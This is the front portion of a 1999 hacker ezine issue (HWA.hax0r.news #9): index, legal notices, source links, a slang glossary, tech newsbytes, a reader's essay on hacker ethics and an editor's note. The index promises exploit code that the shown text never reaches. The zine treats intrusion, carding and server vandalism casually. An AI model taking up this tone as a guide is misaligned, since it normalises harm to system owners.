💾 Archived View for clemat.is › saccophore › library › ezines › textfiles › ezines › HWA › hwa-hn09.… captured on 2022-01-08 at 15:58:53.
⬅️ Previous capture (2021-12-03)
-=-=-=-=-=-=-
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= ========================================================================== = <=-[ HWA.hax0r.news ]-=> = ========================================================================== [=HWA'99=] Number 9 Volume 1 1999 March 13th 99 ========================================================================== Are you running WindowsNT and still under the illusion that it is secure? ``A couple of freelance writers are working on a story for us about security auditing and protection. As part of their "research," they decided to see if they could hack into one of our lab networks. It took them only a few hours to successfully break into our Windows NT boxes. And from there, they learned the configuration of our lab networks, the server names and functions, the operating systems we run and most of the passwords on the key accounts on our Microsoft Windows NT, Novell NetWare and Unix servers, as well as a good many of our routers and switches.'' - From NetworkWeek, Story in section 10.0 Synopsis -------- The purpose of this newsletter is to 'digest' current events of interest that affect the online underground and netizens in general. This includes coverage of general security issues, hacks, exploits, underground news and anything else I think is worthy of a look see. This list is NOT meant as a replacement for, nor to compete with, the likes of publications such as CuD or PHRACK or with news sites such as AntiOnline, the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN nor could any other 'digest' of this type do so. It *is* intended however, to compliment such material and provide a reference to those who follow the culture by keeping tabs on as many sources as possible and providing links to further info, its a labour of love and will be continued for as long as I feel like it, i'm not motivated by dollars or the illusion of fame, did you ever notice how the most famous/infamous hackers are the ones that get caught? there's a lot to be said for remaining just outside the circle... <g> @HWA =-----------------------------------------------------------------------= Welcome to HWA.hax0r.news ... #9 =-----------------------------------------------------------------------= "I'm doing the BEST I can so don't give me any SHIT" - Seen on a button worn by `Ed'.. ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** *** *** *** please join to discuss or impart news on techno/phac scene *** *** stuff or just to hang out ... someone is usually around 24/7*** ******************************************************************* =-------------------------------------------------------------------------= Issue #9 Empirical knowledge is power =--------------------------------------------------------------------------= inet.d THIS b1lly the llammah ________ ------- ___________________________________________________________ |\____\_/[ INDEX ]__________________________________________________________/| | | || | | Key Content || \|_________________________________________________________________________/ 00.0 .. COPYRIGHTS 00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC 00.2 .. SOURCES 00.3 .. THIS IS WHO WE ARE 00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'? 00.5 .. THE HWA_FAQ V1.0 \__________________________________________________________________________/ 01.0 .. Greets 01.1 .. Last minute stuff, rumours, newsbytes 01.2 .. Mailbag 02.0 .. From the editor 02.1 .. Demoniz trashcans his webboard 03.0 .. AntiOnline, armed with dollars and lawyers, muscles in on Innerpulse 03.1 .. The FPSC-IRCD.txt advisory. 04.0 .. Pentagon under attack (again) 04.1 .. Passwords visible in plaintext in Cheyenne's Anti-Virus Agent for Exchange. 04.2 .. New Backdoor found: Default passwords in Bay networks switches 04.3 .. ISAPI exploit code 04.4 .. Winfreez.c new exploit code for win9x and NT 04.5 .. Unknown Zone: Windows intra/inter net zone difficulties 04.6 .. Sniffing out MS Security glitch 05.0 .. Linux TCP flaw exploit code for Linux 2.0.35 and older. (includes Solaris version) 06.0 .. Solaris 2.6 x86 /usr/bin/write buffer overflow exploit 07.0 .. New Computer Technology Makes Hacking a Snap - Washington Post 08.0 .. Korean "Superhacker" a national resource... 09.0 .. The l0pht and NFR team up to produce top flight IDS 10.0 .. A good example of how 'Secure' NT really is 11.0 .. CON: The Black Hat Briefings Security Conference 12.0 .. CON: CQRE [Secure] Congress and Exhibition 13.0 .. CON: can't afford $2k? check out Canc0n99 security Conference 14.0 .. CON: Countering cyberterrorism AD.S .. Post your site ads or etc here, if you can offer something in return thats tres cool, if not we'll consider ur ad anyways so send it in. H.W .. Hacked Websites A.0 .. APPENDICES A.1 .. PHACVW linx and references ____________________________________________________________________________ |\__________________________________________________________________________/| | | || | | || \|_________________________________________________________________________|/ @HWA'99 00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ). Important semi-legalese and license to redistribute: YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email cruciphux@dok.org THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS: I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND REDISTRIBUTE/MIRROR. - EoD Although this file and all future issues are now copyright, some of the content holds its own copyright and these are printed and respected. News is news so i'll print any and all news but will quote sources when the source is known, if its good enough for CNN its good enough for me. And i'm doing it for free on my own time so pfffft. :) No monies are made or sought through the distribution of this material. If you have a problem or concern email me and we'll discuss it. cruciphux@dok.org Cruciphux [C*:.] 00.1 CONTACT INFORMATION AND MAIL DROP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Has it occurred to anybody that "AOL for Dummies" is an extremely redundant name for a book? - unknown Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada / North America (hell even if you are inside ..) and wish to send printed matter like newspaper clippings a subscription to your cool foreign hacking zine or photos, small non-explosive packages or sensitive information etc etc well, now you can. (w00t) please no more inflatable sheep or plastic dog droppings, or fake vomit thanks. Send all goodies to: HWA NEWS P.O BOX 44118 370 MAIN ST. NORTH BRAMPTON, ONTARIO CANADA L6V 4H5 WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are ~~~~~~~ reading this from some interesting places, make my day and get a mention in the zine, send in a postcard, I realize that some places it is cost prohibitive but if you have the time and money be a cool dude / gal and send a poor guy a postcard preferably one that has some scenery from your place of residence for my collection, I collect stamps too so you kill two birds with one stone by being cool and mailing in a postcard, return address not necessary, just a "hey guys being cool in Bahrain, take it easy" will do ... ;-) thanx. Ideas for interesting 'stuff' to send in apart from news: - Photo copies of old system manual front pages (optionally signed by you) ;-) - Photos of yourself, your mom, sister, dog and or cat in a NON compromising position plz I don't want pr0n. <g> - Picture postcards - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes with hack/security related archives, logs, irc logs etc on em. - audio or video cassettes of yourself/others etc of interesting phone fun or social engineering examples or transcripts thereof. If you still can't think of anything you're probably not that interesting a person after all so don't worry about it <BeG> Our current email: Submissions/zine gossip.....: hwa@press.usmc.net Private email to editor.....: cruciphux@dok.org Distribution/Website........: sas72@usa.net @HWA 00.2 Sources *** ~~~~~~~~~~~ Sources can be some, all, or none of the following (by no means complete nor listed in any degree of importance) Unless otherwise noted, like msgs from lists or news from other sites, articles and information is compiled and or sourced by Cruciphux no copyright claimed. HiR:Hackers Information Report... http://axon.jccc.net/hir/ News & I/O zine ................. http://www.antionline.com/ *News/Hacker site................. http://www.bikkel.com/~demoniz/ *DOWN!* News (New site unconfirmed).......http://cnewz98.hypermart.net/ Back Orifice/cDc..................http://www.cultdeadcow.com/ News site (HNN) .....,............http://www.hackernews.com/ Help Net Security.................http://net-security.org/ News,Advisories,++ ...............http://www.l0pht.com/ NewsTrolls (HNN)..................http://www.newstrolls.com/ News + Exploit archive ...........http://www.rootshell.com/beta/news.html CuD ..............................http://www.soci.niu.edu/~cudigest News site+........................http://www.zdnet.com/ +Various mailing lists and some newsgroups, such as ... +other sites available on the HNN affiliates page, please see http://www.hackernews.com/affiliates.html as they seem to be popping up rather frequently ... * Yes demoniz is now officially retired, if you go to that site though the Bikkel web board (as of this writing) is STILL ACTIVE, www.hwa-iwa.org will also be hosting a webboard as soon as that site comes online perhaps you can visit it and check us out if I can get some decent wwwboard code running I don't really want to write my own, another alternative being considered is a telnet bbs that will be semi-open to all, you will be kept posted. - cruciphux http://www.the-project.org/ .. IRC list/admin archives http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk alt.hackers.malicious alt.hackers alt.2600 BUGTRAQ ISN security mailing list ntbugtraq <+others> NEWS Agencies, News search engines etc: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.cnn.com/SEARCH/ http://www.foxnews.com/search/cgi-bin/search.cgi?query=cracker&days=0&wires=0&startwire=0 http://www.news.com/Searching/Results/1,18,1,00.html?querystr=cracker http://www.ottawacitizen.com/business/ http://search.yahoo.com.sg/search/news_sg?p=cracker http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=cracker http://www.zdnet.com/zdtv/cybercrime/ http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column) NOTE: See appendices for details on other links. http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm http://freespeech.org/eua/ Electronic Underground Affiliation http://www.l0pht.com/cyberul.html http://www.hackernews.com/archive.html?122998.html http://ech0.cjb.net ech0 Security http://net-security.org Net Security ... Submissions/Hints/Tips/Etc ~~~~~~~~~~~~~~~~~~~~~~~~~~ All submissions that are `published' are printed with the credits you provide, if no response is received by a week or two it is assumed that you don't care wether the article/email is to be used in an issue or not and may be used at my discretion. Looking for: Good news sites that are not already listed here OR on the HNN affiliates page at http://www.hackernews.com/affiliates.html Magazines (complete or just the articles) of breaking sekurity or hacker activity in your region, this includes telephone phraud and any other technological use, abuse hole or cool thingy. ;-) cut em out and send it to the drop box. - Ed Mailing List Subscription Info (Far from complete) Feb 1999 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~ ISS Security mailing list faq : http://www.iss.net/iss/maillist.html THE MOST READ: BUGTRAQ - Subscription info ~~~~~~~~~~~~~~~~~~~~~~~~~~~ What is Bugtraq? Bugtraq is a full-disclosure UNIX security mailing list, (see the info file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to bugtraq, send mail to listserv@netspace.org containing the message body subscribe bugtraq. I've been archiving this list on the web since late 1993. It is searchable with glimpse and archived on-the-fly with hypermail. Searchable Hypermail Index; http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html About the Bugtraq mailing list ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The following comes from Bugtraq's info file: This list is for *detailed* discussion of UNIX security holes: what they are, how to exploit, and what to do to fix them. This list is not intended to be about cracking systems or exploiting their vulnerabilities. It is about defining, recognizing, and preventing use of security holes and risks. Please refrain from posting one-line messages or messages that do not contain any substance that can relate to this list`s charter. I will allow certain informational posts regarding updates to security tools, documents, etc. But I will not tolerate any unnecessary or nonessential "noise" on this list. Please follow the below guidelines on what kind of information should be posted to the Bugtraq list: + Information on Unix related security holes/backdoors (past and present) + Exploit programs, scripts or detailed processes about the above + Patches, workarounds, fixes + Announcements, advisories or warnings + Ideas, future plans or current works dealing with Unix security + Information material regarding vendor contacts and procedures + Individual experiences in dealing with above vendors or security organizations + Incident advisories or informational reporting Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq reflector address if the response does not meet the above criteria. Remember: YOYOW. You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of those words without your permission in any medium outside the distribution of this list may be challenged by you, the author. For questions or comments, please mail me: chasin@crimelab.com (Scott Chasin) BEST-OF-SECURITY Subscription Info. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ _/_/_/ _/_/ _/_/_/ _/ _/ _/ _/ _/ _/_/_/ _/ _/ _/_/ _/ _/ _/ _/ _/ _/_/_/ _/_/ _/_/_/ Best Of Security "echo subscribe|mail best-of-security-request@suburbia.net" or "echo subscribe|mail best-of-security-request-d@suburbia.net" (weekly digest) For those of you that just don't get the above, try sending a message to best-of-security-request@suburbia.net with a subject and body of subscribe and you will get added to the list (maybe, if the admin likes your email). Crypto-Gram ~~~~~~~~~~~ CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security. To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com.� To unsubscribe, visit http://www.counterpane.com/unsubform.html.� Back issues are available on http://www.counterpane.com. CRYPTO-GRAM is written by Bruce Schneier.� Schneier is president of Counterpane Systems, the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms.� He served on the board of the International Association for Cryptologic Research, EPIC, and VTW.� He is a frequent writer and lecturer on cryptography. CUD Computer Underground Digest ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This info directly from their latest ish: Computer underground Digest��� Sun� 14 Feb, 1999�� Volume 11 : Issue 09 ����� ��������������������� ISSN� 1004-042X ������ Editor: Jim Thomas (cudigest@sun.soci.niu.edu) ������ News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu) ������ Archivist: Brendan Kehoe ������ Poof Reader:�� Etaion Shrdlu, Jr. ������ Shadow-Archivists: Dan Carosone / Paul Southworth ������������������������� Ralph Sims / Jyrki Kuoppala ������������������������� Ian Dickinson ������ Cu Digest Homepage: http://www.soci.niu.edu/~cudigest [ISN] Security list ~~~~~~~~~~~~~~~~~~~ This is a low volume list with lots of informative articles, if I had my way i'd reproduce them ALL here, well almost all .... ;-) - Ed Subscribe: mail majordomo@repsec.com with "subscribe isn". @HWA 00.3 THIS IS WHO WE ARE ~~~~~~~~~~~~~~~~~~ "If all it takes is a million monkeys banging on keyboards then how come AOL hasn't turned out any Shakespeare yet??" - Anon. Some HWA members and Legacy staff ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ cruciphux@dok.org.........: currently active/editorial darkshadez@ThePentagon.com: currently active/man in black fprophet@dok.org..........: currently active/IRC+ man in black sas72@usa.net ............. currently active/IRC+ distribution vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black dicentra...(email withheld): IRC+ grrl in black Foreign Correspondants/affiliate members ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ATTENTION: All foreign correspondants please check in or be removed by next issue I need your current emails since contact info was recently lost in a HD mishap and i'm not carrying any deadweight. Plus we need more people sending in info, my apologies for not getting back to you if you sent in January I lost it, please resend. N0Portz ..........................: Australia Qubik ............................: United Kingdom system error .....................: Indonesia Wile (wile coyote) ...............: Japan/the East Ruffneck ........................: Netherlands/Holland And unofficially yet contributing too much to ignore ;) Spikeman .........................: World media Please send in your sites for inclusion here if you haven't already also if you want your emails listed send me a note ... - Ed http://www.genocide2600.com/~spikeman/ .. Spikeman's DoS and protection site Contributors to this issue: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Spikeman .........................: daily news updates+ ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** ******************************************************************* :-p 1. We do NOT work for the government in any shape or form.Unless you count paying taxes ... in which case we work for the gov't in a BIG WAY. :-/ 2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news events its a good idea to check out issue #1 at least and possibly also the Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ... @HWA 00.4 Whats in a name? why HWA.hax0r.news?? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "When i'm 21 i'm going to change my name to 'Anonymous' and claim royalties for all the editorials written and attributed to my name." - Anonymous Well what does HWA stand for? never mind if you ever find out I may have to get those hax0rs from 'Hackers' or the Pretorians after you. In case you couldn't figure it out hax0r is "new skewl" and although it is laughed at, shunned, or even pidgeon holed with those 'dumb leet (l33t?) dewds' <see article in issue #4> this is the state of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you up and comers, i'd highly recommend you get that book. Its almost like buying a clue. Anyway..on with the show .. - Editorial staff @HWA 00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Also released in issue #3. (revised) check that issue for the faq it won't be reprinted unless changed in a big way with the exception of the following excerpt from the FAQ, included to assist first time readers: Some of the stuff related to personal useage and use in this zine are listed below: Some are very useful, others attempt to deny the any possible attempts at eschewing obfuscation by obsucuring their actual definitions. @HWA - see EoA ;-) != - Mathematical notation "is not equal to" or "does not equal" ASC(247) "wavey equals" sign means "almost equal" to. If written an =/= (equals sign with a slash thru it) also means !=, =< is Equal to or less than and => is equal to or greater than (etc, this aint fucking grade school, cripes, don't believe I just typed all that..) AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21) AOL - A great deal of people that got ripped off for net access by a huge clueless isp with sekurity that you can drive buses through, we're not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the least they could try leasing one?? *CC - 1 - Credit Card (as in phraud) 2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's CCC - Chaos Computer Club (Germany) *CON - Conference, a place hackers crackers and hax0rs among others go to swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk watch videos and seminars, get drunk, listen to speakers, and last but not least, get drunk. *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker speak he's the guy that breaks into systems and is often (but by no means always) a "script kiddie" see pheer 2 . An edible biscuit usually crappy tasting without a nice dip, I like jalapeno pepper dip or chives sour cream and onion, yum - Ed Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger Vanilla Ice is a wigger, The Beastie Boys and rappers speak using ebonics, speaking in a dark tongue ... being ereet, see pheer EoC - End of Commentary EoA - End of Article or more commonly @HWA EoF - End of file EoD - End of diatribe (AOL'ers: look it up) FUD - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt", usually in general media articles not high brow articles such as ours or other HNN affiliates ;) du0d - a small furry animal that scurries over keyboards causing people to type wierd crap on irc, hence when someone says something stupid or off topic 'du0d wtf are you talkin about' may be used. *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to define, I think it is best defined as pop culture's view on The Hacker ala movies such as well erhm "Hackers" and The Net etc... usually used by "real" hackers or crackers in a derogatory or slang humorous way, like 'hax0r me some coffee?' or can you hax0r some bread on the way to the table please?' 2 - A tool for cutting sheet metal. HHN - Maybe a bit confusing with HNN but we did spring to life around the same time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper noun means the hackernews site proper. k? k. ;& HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d MFI/MOI- Missing on/from IRC NFC - Depends on context: No Further Comment or No Fucking Comment NFR - Network Flight Recorder (Do a websearch) see 0wn3d NFW - No fuckin'way *0WN3D - You are cracked and owned by an elite entity see pheer *OFCS - Oh for christ's sakes PHACV - And variations of same <coff> Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare Alternates: H - hacking, hacktivist C - Cracking <software> C - Cracking <systems hacking> V - Virus W - Warfare <cyberwarfare usually as in Jihad> CT - Cyber Terrorism *PHEER - This is what you do when an ereet or elite person is in your presence see 0wn3d *RTFM - Read the fucking manual - not always applicable since some manuals are pure shit but if the answer you seek is indeed in the manual then you should have RTFM you dumb ass. TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0 TBA - To Be Arranged/To Be Announced also 2ba TFS - Tough fucking shit. *w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions from the underground masses. also "w00ten" <sic> 2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers) *wtf - what the fuck *ZEN - The state you reach when you *think* you know everything (but really don't) usually shortly after reaching the ZEN like state something will break that you just 'fixed' or tweaked. @HWA -=- :. .: -=- 01.0 Greets!?!?! yeah greets! w0w huh. - Ed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Thanks to all in the community for their support and interest but i'd like to see more reader input, help me out here, whats good, what sucks etc, not that I guarantee i'll take any notice mind you, but send in your thoughts anyway. Shouts to: * Kevin Mitnick * demoniz * The l0pht crew * tattooman * Dicentra * Pyra * Vexxation * FProphet * TwistedP * NeMstah * the readers * mj * Kokey * ypwitch * kimmie * tsal * spikeman * YOU. * #leetchans ppl, you know who you are... * all the people who sent in cool emails and support * our new 'staff' members. kewl sites: + http://www.freshmeat.net/ + http://www.slashdot.org/ + http://www.l0pht.com/ + http://www.2600.com/ + http://hacknews.bikkel.com/ (http://www.bikkel.com/~demoniz/) + http://www.legions.org/ + http://www.genocide2600.com/ + http://www.genocide2600.com/~spikeman/ + http://www.genocide2600.com/~tattooman/ + http://www.hackernews.com/ (Went online same time we started issue 1!) @HWA 01.1 Last minute stuff, rumours and newsbytes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "What is popular isn't always right, and what is right isn't always popular..." - FProphet '99 +++ When was the last time you backed up your important data? ++ BORED? You may be interested in this... http://www.patents.ibm.com/details?patent_number=5501650 if that isn't quite your erh speed, then you can always check out http://www.hamsterdance.com/ for a laugh I enjoyed it ...the graphics are most amusing. ++ SO YOU SAY YOUR MACHINE CRASHES EVERY MONTH OR SO? Contributed by FProphet source: Betanews.com And you thought it was just you. Betanews.com (www.betanews.com) reports that Microsoft has acknowledged a new bug discovered in Windows that locksa machine after 49.7 days of consecutive usage. A fix is available now, and is expected to appear in the forthcoming Windows 98 service release update, currently expected to be released in April. Microsoft's Personal Support Center has details. ++ INTEL PENTIUM III CHIP SERIAL NUMBERS CAN BE RETRIEVED BY ANYONE Mar 11th Contributed by Ed Intel released a program that allows the user to turn off the serial number of their new Pentium III chip, but Zero-Knowledge Systems claims it has developed an exploit which will retrieve the serial number wether the feature is turned on or off. I don't have one of these chips to test this out on so can't confirm or deny this report. ++ BANK PLAN FOES LINE UP http://www.wired.com/news/news/email/explode-infobeat/politics/story/18271.html Opponents of "Know Your Customer," a controversial plan by the government to monitor individuals' banking activities, will make their case on Capitol Hill. By Declan McCullagh. ++ DELL TO BUY BOATLOAD FROM IBM http://www.wired.com/news/news/email/explode-infobeat/business/story/18266.html Dell will buy about US$16 billion of chips, drives, and monitors from IBM during the next seven years. It's a nice boost to both companies. ++ CANADIAN TELECOM BEHEMOTH BORN http://www.wired.com/news/news/email/explode-infobeat/business/story/18269.html ++ AT&T Canada buys regional phone firm Metronet communications in US$4.6 billion deal. ++ EUROPEAN TELECOMS: BUY, BUY, BUY http://www.wired.com/news/news/email/explode-infobeat/business/story/18268.html France's Alcatel agrees to buy another California Internet company for US$350 million. And Germany's Seimens is expected to spend $US1.7 billion on US data-networking firms. ++ IT'S A LINUXWORLD AFTER ALL http://www.wired.com/news/news/email/explode-infobeat/technology/story/18261.html This week's conference is turning a tightknit community into an international phenomenon. Not all of the new industry stars are ready for the spotlight. Polly Sprenger reports from San Jose, California. ++ LINUX GETS OPEN-SOURCE GUI http://www.wired.com/news/news/email/explode-infobeat/technology/story/18265.html Thanks to an interface lift, Linux is ready to star on the desktop. GNOME marries components from familiar windowing environments and adds a few things of its own. Leander Kahney reports from San Jose, California. ++ NIPPING AT THE HEELS OF MP3 http://www.wired.com/news/news/email/explode-infobeat/technology/story/18253.html When high tech does battle on the Net, it's not always the best tech that wins. This is the lesson that a smaller, faster digital music format is learning in the face of MP3. By Christopher Jones. ++ TURNING DATA INTO DOLLARS http://www.wired.com/news/news/email/explode-infobeat/business/story/18254.html PeopleSoft stores information on about 30 million employees worldwide. Now the company is looking to generate e-business from its data banks, a plan that's raising eyebrows. By Joanna Glasner. ++ FROM COMDEX TO VENICE http://www.wired.com/news/news/email/explode-infobeat/culture/story/18258.html The creator of one of the world's biggest computer-trade shows builds the world's most high-tech hotel. Vince Beiser reports from Las Vegas. ++ NO TIME FOR PAIN http://www.wired.com/news/news/email/explode-infobeat/technology/story/18255.html A new therapy using electric current reduces chronic back pain, according to a study in the Journal of the American Medical Association. By Kristen Philipkoski. ++ MONICA'S BIO, BYTE BY BYTE http://www.wired.com/news/news/email/explode-infobeat/culture/story/18257.html Monica's Story, the Lewinsky memoir hitting bookstores on Thursday, will be the first book published simultaneously in e-book and paper form. By Steve Silberman. ++ BIG INSIDER SALES AT YAHOO http://www.wired.com/news/news/email/explode-infobeat/business/story/18251.html Executives sold close to a million shares in February. Analysts say this could be a red flag. By Jennifer Sullivan. ++ SENATE HEARS Y2K LIABILITY ACT http://www.wired.com/news/news/email/explode-infobeat/politics/story/18259.html Two senators introduce the latest legislation to head off a raft of Year 2000 lawsuits arising from failed computer systems. By Heidi Kriz. ++ BRITS ON NET: JOLLY GOOD http://www.wired.com/news/news/email/explode-infobeat/technology/story/18260.html Ten thousand new Britons log on each day, a new poll reveals. German newbies nip close at their their heels, but France has a ways to go. ++ KING FOR THE DOMAINS IN SIGHT http://www.wired.com/news/news/email/explode-infobeat/politics/story/18245.html The Internet Corporation for Assigned Names and Numbers finalizes proposals that will lay down the law on .com -- as well as .biz, .xxx, and other future top-level domains. By Chris Oakes. ++ GREENSPAN: BE WARY OF NET STOCKS (BUS. Wednesday) http://www.wired.com/news/news/email/explode-infobeat/business/story/18250.html Older investors looking to retire should stay away from Internet stocks, the Federal Reserve chairman tells Congress. ++ CLINTON TABS PRIVACY POINT MAN (POL. Wednesday) http://www.wired.com/news/news/email/explode-infobeat/politics/story/18249.html An Ohio State law professor will represent the administration's views concerning online privacy, an issue which gains a little more momentum every day. By Declan McCullagh and James Glave. ++ MUSIC INDUSTRY PLANS DVD AUDIO http://www.wired.com/news/news/email/explode-infobeat/technology/story/18247.html Record companies and technology companies agree on a copy-protection framework for the successor to CDs. DVD Audio is finally ready for consumers. By Christopher Jones. ++ DELL MORPHS INTO A RETAILER http://www.wired.com/news/news/email/explode-infobeat/business/story/18242.html The world's biggest direct seller of PCs hopes to become a big online seller of consumer electronics too. Wednesday, it launched its own online superstore. ++ LINUX, MEET OPERA http://www.wired.com/news/news/email/explode-infobeat/technology/story/18241.html Fans of Linux and Opera, which have both built support by taking on the bigwigs, can now run the underdog browser on the underdog OS. Mucho thanks to Spikeman for directing his efforts to our cause of bringing you the news we want to read about in a timely manner ... - Ed @HWA 01.2 MAILBAG ~~~~~~~ Lots of mail, not much for sharing here though ... keep the letters coming! but don't forget to include something I can print too... ;) . . . . . . . // Written by NUL (If you don't know, don't ask) // http://come.to/hexx (UnderConstruction) // jeanclaude@canada.com // 99/03/11 #include <If you want to, you can.> To start this off I would like to make one thing abundantly clear: I do not consider myself a hacker. I'm more interested in programing than anything else. Sure, I've toiled a bit, but I cannot be considered as one of the El33t. The reason for which I am writing this little article is to try to place a bit of clairity on the reasons for hacking / cracking (or at least trying to make sence of them). /* */ Hacking, the original motto was to do no damage, but as time went by and people develloped new skills, they decided that the original motto no longer applied to them. Thus the cracker was born. Hacking and Cracking are two different entities. You can not be both at the same time. You are either one or the other. (For those of you who consider youselves as hackers or crackers but use other peoples' scirpts to hack/crack, you are neither. Anybody can point and click their way along or run a programe which does all the work for you, it doesn't require any talent.) There are a few things that I find pointless in what the cracker community is doing: First off: What the hell is the point of saying a server's security is shit if you don't help the server fix it??? What? Hack into it a second time? (I know there are a few groups out there who actually do help the servers they crack. This part doesn't concern you.) Second: Why the hell do people think that they are Eleet when they use a script to determine what systems are vulnerable? And exploit that vulnerability. Just because you know one or two tricks doesn't make you anything. Third: & what the hell is the point of writing in Eleet text? It's all fine and dandy if you can't spell, but please, half the time you sound like you never got a high school education! Power can only corrupt. Crackers who devellope thier skills eventually loose control (though this isn't true for everybody) they can't help but feel destructive. Though there are different levels of destructiveness (as I see it): A: Destroying all information, just for the heck of it. B: Destributing information / programs to ruin a business. C: Defacing information. D: Replacing information, but leaving a back-up copy. E: Destroying all information, for good purposes. The last one (E) does fall into the category of cracking because it still is vandalisment of information even though it's for a good purpose (Cracking the KKK server(s) and destroying everything would be considered a class E). Ok, ok I know... This did kindof turn out to be a bit differently then what it was supposed to be, but still I think I did manage to get a small message accross... // EOF Props to; Parse, OTH, kokey, Pyra, Qubic, siko, spikeman and spacerogue and tattooman among others .. @HWA 02.0 From the editor.#9 ~~~~~~~~~~~~~~~~~~ #include <stdio.h> #include <thoughts.h> #include <backup.h> main() { printf ("Read commented source!\n\n"); /* * Blech, fuck snow ... and overclocked chips that can't take the *heat even with oversize fans and sinks duct taped to them ... ;) * *Moving right along, thanks for the continued support everyone and tty next time... */ printf ("EoF.\n"); } w00t w00t w00t! ... w00t! /`wu:t n & v w00ten /`wu:ten n & v Eng. Unk. 1. A transcursion or transcendance into joy from an otherwise inert state 2. Something Cruciphux can't go a day without typing on Efnet Congrats, thanks, articles, news submissions and kudos to us at the main address: hwa@press.usmc.net complaints and all nastygrams and mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org danke. C*:. @HWA 02.1 Demoniz trashcans his webboard 